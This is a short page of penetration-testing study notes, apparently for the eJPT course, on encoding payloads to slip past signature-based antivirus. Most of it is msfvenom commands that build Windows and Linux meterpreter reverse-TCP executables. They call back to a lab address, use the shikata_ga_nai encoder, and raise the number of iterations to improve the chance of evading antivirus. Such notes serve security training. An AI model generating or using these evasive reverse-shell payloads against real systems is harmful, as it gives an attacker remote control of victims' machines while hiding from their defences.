Encoding Payloads

Signature based Antivirus solutions can detect malicious files or executables. Older AV solutions can be evaded by encoding the payloads.

❗ This kind of attack vector is outdated and hardly used today.
May work on legacy old O.S. like Windows 7 or older.

🗒️ Payload Encoding involves changing the payload shellcode with the aim of changing the payload signature.

Encoding will not always avoid detection

🗒️ Shellcode is the code typically used as a payload for exploitation, that provides with a remote command shell on the target system.

msfvenom --list encoders

Excellent encoders are cmd/powershell_base64 and x86/shikata_ga_nai

#Windows Payload

Generate a Win x86 payload and encode it with shikata_ga_nai:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe

The payload can be encoded as often as desired by increasing the number of iterations.
The more iterations, the better chances to bypass an Antivirus. Use -i option.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > /home/kali/certs/ejpt/Windows_Payloads/encodedx86.exe

#Linux Payload

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > /home/kali/certs/ejpt/Linux_Payloads/encodedx86

PreviousPayloads NextInjecting Payloads into PEs

Last updated 1 year ago